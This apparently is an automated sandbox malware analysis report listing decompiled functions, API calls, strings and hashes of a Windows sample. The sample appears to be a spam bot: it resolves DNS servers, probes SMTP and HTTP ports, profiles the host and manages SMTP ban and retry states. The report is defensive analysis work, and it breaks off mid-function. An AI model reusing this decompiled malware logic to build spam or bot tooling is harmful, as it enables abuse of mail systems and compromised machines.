                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402DF2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97memorylibrarynetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}


















                                                                                                                                  0x00402dfb
                                                                                                                                  0x00402e01
                                                                                                                                  0x00402e09
                                                                                                                                  0x00402e11
                                                                                                                                  0x00402e11
                                                                                                                                  0x00402e19
                                                                                                                                  0x00402ef1
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e28
                                                                                                                                  0x00402e34
                                                                                                                                  0x00402e38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e4f
                                                                                                                                  0x00402e55
                                                                                                                                  0x00402e5a
                                                                                                                                  0x00402e5d
                                                                                                                                  0x00402e60
                                                                                                                                  0x00402e64
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e6d
                                                                                                                                  0x00402e70
                                                                                                                                  0x00402e76
                                                                                                                                  0x00402ede
                                                                                                                                  0x00402ee6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e7d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e81
                                                                                                                                  0x00402e84
                                                                                                                                  0x00402e88
                                                                                                                                  0x00402e8f
                                                                                                                                  0x00402e93
                                                                                                                                  0x00402e99
                                                                                                                                  0x00402e9e
                                                                                                                                  0x00402ea6
                                                                                                                                  0x00402eae
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402eb5
                                                                                                                                  0x00402eb7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402eba
                                                                                                                                  0x00402eba
                                                                                                                                  0x00402ebc
                                                                                                                                  0x00402eca
                                                                                                                                  0x00402ed0
                                                                                                                                  0x00402ed1
                                                                                                                                  0x00402ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ed6
                                                                                                                                  0x00402ebc
                                                                                                                                  0x00402ed8
                                                                                                                                  0x00402ed8
                                                                                                                                  0x00402eda
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e78

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                                                                  • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                                                                  • htons.WS2_32(00000035), ref: 00402E88
                                                                                                                                  • inet_addr.WS2_32(?), ref: 00402E93
                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                                                                  • String ID: GetNetworkParams$iphlpapi.dll
                                                                                                                                  • API String ID: 929413710-2099955842
                                                                                                                                  • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                                                                  • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                                                                  • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD958D Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 284registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 00AD95A7
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00AD95D5
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00AD95DC
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9635
                                                                                                                                  • wsprintfA.USER32 ref: 00AD9673
                                                                                                                                  • wsprintfA.USER32 ref: 00AD96F4
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 00AD9758
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00AD978D
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00AD97D8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 3696105349-2980165447
                                                                                                                                  • Opcode ID: 55954e61d5c80e698eeb98dbff3eb75aee7b212b9e9189140abe34f1098026de
                                                                                                                                  • Instruction ID: 10fa2c72f7e523973eb5dd47667268336f879b13af878685761b28faf0bc6e60
                                                                                                                                  • Opcode Fuzzy Hash: 55954e61d5c80e698eeb98dbff3eb75aee7b212b9e9189140abe34f1098026de
                                                                                                                                  • Instruction Fuzzy Hash: C3A14BB1900208AFEB21DFA0DD45FDF3BACEB05741F104027FA1696251E7B5D984DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD1FFD Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 205libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00AD202D
                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00AD204F
                                                                                                                                  • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 00AD206A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00AD2071
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00AD2082
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00AD2230
                                                                                                                                    • Part of subcall function 00AD1E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 00AD1E7C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                                                                  • String ID: 0 v$flags_upd$hi_id$localcfg$work_srv
                                                                                                                                  • API String ID: 4207808166-3247798257
                                                                                                                                  • Opcode ID: 11873b88ce4c80726b70a44c2ad5ffb589aabd6faaac21518102ee957b529b84
                                                                                                                                  • Instruction ID: 655be9775e1357474b8b1f91d3b94ec8e4299c67ac0bc3351621450b198cd846
                                                                                                                                  • Opcode Fuzzy Hash: 11873b88ce4c80726b70a44c2ad5ffb589aabd6faaac21518102ee957b529b84
                                                                                                                                  • Instruction Fuzzy Hash: 0E51C2B0500344AFE330AF658D86FA7BAECEF54704F00492EF99786252D7B9A944C7A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402011 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 160COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E00402011() {
				long _t35;
				void* _t45;
				intOrPtr _t47;
				void* _t51;
				char* _t53;
				char* _t58;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				void* _t104;
				void* _t122;

				if(( *0x4122f4 & 0x00000001) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000001;
					 *0x4122f0 = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000002) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000002;
					 *0x4122ec = E0040F04E(0);
				}
				if(( *0x4122f4 & 0x00000004) == 0) {
					 *0x4122f4 =  *0x4122f4 | 0x00000004;
					 *0x4122e8 = E0040F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x4122e0 > 0xdbba0) {
					_t58 =  *0x412000; // 0x410288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x412000;
						do {
							if(E00402684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00401978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x412000 + _t103 * 4;
						} while ( *((char*)( *(0x412000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x4122e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x4122dc > 0xdbba0) {
					_t53 =  *0x412000; // 0x410288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x412000;
						do {
							if(E00402EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00401978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x412000 + _t102 * 4;
						} while ( *((char*)( *(0x412000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x4122dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x412110;
				_t45 = E0040F04E(0) -  *0x4122f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x4122e4; // 0x0
				if(_t122 > 0) {
					E0040E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x410264);
					_t51 = E0040E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x4122e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00401C5F(_t124);
							 *0x4122e4 = 0x4b0;
						}
					}
				}
				_t47 = E0040F04E(0) -  *0x4122f0;
				if(_t47 > 0x4b0) {
					E0040EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0040F04E(0);
					 *0x4122f0 = _t47;
				}
				return _t47;
			}














                                                                                                                                  0x0040201e
                                                                                                                                  0x00402020
                                                                                                                                  0x0040202f
                                                                                                                                  0x0040202f
                                                                                                                                  0x0040203b
                                                                                                                                  0x0040203d
                                                                                                                                  0x0040204c
                                                                                                                                  0x0040204c
                                                                                                                                  0x00402058
                                                                                                                                  0x0040205a
                                                                                                                                  0x00402069
                                                                                                                                  0x00402069
                                                                                                                                  0x00402078
                                                                                                                                  0x00402080
                                                                                                                                  0x0040208e
                                                                                                                                  0x00402090
                                                                                                                                  0x00402095
                                                                                                                                  0x0040209a
                                                                                                                                  0x0040209c
                                                                                                                                  0x004020a1
                                                                                                                                  0x004020ab
                                                                                                                                  0x00000000
                                                                                                                                  0x004020ad
                                                                                                                                  0x004020ad
                                                                                                                                  0x004020bd
                                                                                                                                  0x004020d0
                                                                                                                                  0x004020d0
                                                                                                                                  0x004020d0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004020bd
                                                                                                                                  0x00000000
                                                                                                                                  0x004020bf
                                                                                                                                  0x004020bf
                                                                                                                                  0x004020c0
                                                                                                                                  0x004020c9
                                                                                                                                  0x004020ce
                                                                                                                                  0x004020d4
                                                                                                                                  0x004020d6
                                                                                                                                  0x004020d6
                                                                                                                                  0x004020e5
                                                                                                                                  0x004020e7
                                                                                                                                  0x004020ec
                                                                                                                                  0x004020f1
                                                                                                                                  0x004020f3
                                                                                                                                  0x004020f8
                                                                                                                                  0x00402102
                                                                                                                                  0x00000000
                                                                                                                                  0x00402104
                                                                                                                                  0x00402104
                                                                                                                                  0x00402114
                                                                                                                                  0x00402127
                                                                                                                                  0x00402127
                                                                                                                                  0x00402127
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402114
                                                                                                                                  0x00000000
                                                                                                                                  0x00402116
                                                                                                                                  0x00402116
                                                                                                                                  0x00402117
                                                                                                                                  0x00402120
                                                                                                                                  0x00402125
                                                                                                                                  0x0040212b
                                                                                                                                  0x0040212d
                                                                                                                                  0x0040212d
                                                                                                                                  0x0040213f
                                                                                                                                  0x00402151
                                                                                                                                  0x00402159
                                                                                                                                  0x00402160
                                                                                                                                  0x0040216a
                                                                                                                                  0x00402170
                                                                                                                                  0x00402189
                                                                                                                                  0x00402197
                                                                                                                                  0x0040219c
                                                                                                                                  0x004021a1
                                                                                                                                  0x004021c1
                                                                                                                                  0x004021c1
                                                                                                                                  0x004021a3
                                                                                                                                  0x004021a3
                                                                                                                                  0x004021a7
                                                                                                                                  0x00000000
                                                                                                                                  0x004021a9
                                                                                                                                  0x004021ad
                                                                                                                                  0x004021ae
                                                                                                                                  0x004021b6
                                                                                                                                  0x004021b9
                                                                                                                                  0x004021b9
                                                                                                                                  0x004021a7
                                                                                                                                  0x004021a1
                                                                                                                                  0x004021d1
                                                                                                                                  0x004021da
                                                                                                                                  0x004021e7
                                                                                                                                  0x004021ed
                                                                                                                                  0x004021f5
                                                                                                                                  0x004021f5
                                                                                                                                  0x00402204

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402078
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020D4
                                                                                                                                  • GetTickCount.KERNEL32 ref: 004020DB
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040212B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402132
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402142
                                                                                                                                    • Part of subcall function 0040F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,?,?,?,000000E4), ref: 0040F089
                                                                                                                                    • Part of subcall function 0040F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0040E342,00000000,745CF210,80000001,00000000,0040E513,?,?,?,?,000000E4,000000C8), ref: 0040F093
                                                                                                                                    • Part of subcall function 0040E854: lstrcpyA.KERNEL32(00000001,?,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E88B
                                                                                                                                    • Part of subcall function 0040E854: lstrlenA.KERNEL32(00000001,?,0040D8DF,00000001,localcfg,except_info,00100000,00410264), ref: 0040E899
                                                                                                                                    • Part of subcall function 00401C5F: wsprintfA.USER32 ref: 00401CE1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                                                                  • String ID: 0 v$localcfg$net_type$rbl_bl$rbl_ip
                                                                                                                                  • API String ID: 3976553417-1551482228
                                                                                                                                  • Opcode ID: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction ID: 2c4ade229706ff5e66d1d9a19171a9bb61e55472092035c31cb102c4d2320628
                                                                                                                                  • Opcode Fuzzy Hash: e666061d80d691fc6b112011ec25e37af1bccbb964f924a1abaaf546849d61ae
                                                                                                                                  • Instruction Fuzzy Hash: CF51F3706043465ED728EB21EF49B9A3BD4BB04318F10447FE605E62E2DBFC9494CA1D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040BE31 Relevance: 18.2, APIs: 6, Strings: 6, Instructions: 152stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x413638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x413634;
							}
						} else {
							_t51 = 0x413630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0040EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0040EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0040EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0040EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0040EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

























                                                                                                                                  0x0040be40
                                                                                                                                  0x0040be43
                                                                                                                                  0x0040be4c
                                                                                                                                  0x0040be53
                                                                                                                                  0x0040be71
                                                                                                                                  0x0040be71
                                                                                                                                  0x0040be77
                                                                                                                                  0x0040be7a
                                                                                                                                  0x0040bf62
                                                                                                                                  0x0040bf6e
                                                                                                                                  0x0040bf83
                                                                                                                                  0x0040bf94
                                                                                                                                  0x0040bf98
                                                                                                                                  0x0040bf9d
                                                                                                                                  0x0040bf9f
                                                                                                                                  0x0040bf9f
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf85
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bf70
                                                                                                                                  0x0040bfa2
                                                                                                                                  0x0040bfa7
                                                                                                                                  0x0040bfab
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bfad
                                                                                                                                  0x0040bfad
                                                                                                                                  0x0040bfaf
                                                                                                                                  0x0040bfbe
                                                                                                                                  0x0040bfb4
                                                                                                                                  0x0040bfb9
                                                                                                                                  0x0040bfba
                                                                                                                                  0x0040bfbd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bfc8
                                                                                                                                  0x0040bfab
                                                                                                                                  0x0040be80
                                                                                                                                  0x0040be83
                                                                                                                                  0x0040be87
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be8d
                                                                                                                                  0x0040be92
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9b
                                                                                                                                  0x0040be9c
                                                                                                                                  0x0040be9d
                                                                                                                                  0x0040bea3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bea9
                                                                                                                                  0x0040beb1
                                                                                                                                  0x0040beb6
                                                                                                                                  0x0040beb7
                                                                                                                                  0x0040bebc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bec6
                                                                                                                                  0x0040becb
                                                                                                                                  0x0040bece
                                                                                                                                  0x0040bed2
                                                                                                                                  0x0040bed6
                                                                                                                                  0x0040bedb
                                                                                                                                  0x0040bee1
                                                                                                                                  0x0040bee4
                                                                                                                                  0x0040bee7
                                                                                                                                  0x0040beee
                                                                                                                                  0x0040bef9
                                                                                                                                  0x0040beff
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf01
                                                                                                                                  0x0040bf02
                                                                                                                                  0x0040bf06
                                                                                                                                  0x0040bf0c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf12
                                                                                                                                  0x0040bf1c
                                                                                                                                  0x0040bf23
                                                                                                                                  0x0040bf26
                                                                                                                                  0x0040bf2c
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf30
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf39
                                                                                                                                  0x0040bf37
                                                                                                                                  0x0040bf49
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040bf4c
                                                                                                                                  0x0040bf10
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf4f
                                                                                                                                  0x0040bf52
                                                                                                                                  0x0040bf55
                                                                                                                                  0x0040bf5a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be61
                                                                                                                                  0x0040be67
                                                                                                                                  0x0040be6b
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x0040bfcd
                                                                                                                                  0x00000000
                                                                                                                                  0x0040be6b

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                                                                  • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
                                                                                                                                  • API String ID: 1586166983-142018493
                                                                                                                                  • Opcode ID: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
                                                                                                                                  • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                                                                  • Opcode Fuzzy Hash: 88ba16253c7691906bbedd67b16b2fe6c1723edfc6ca7cf3586db77342e9cac5
                                                                                                                                  • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040B3C5 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                  			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v132;
				void* _t46;
				char* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t76;
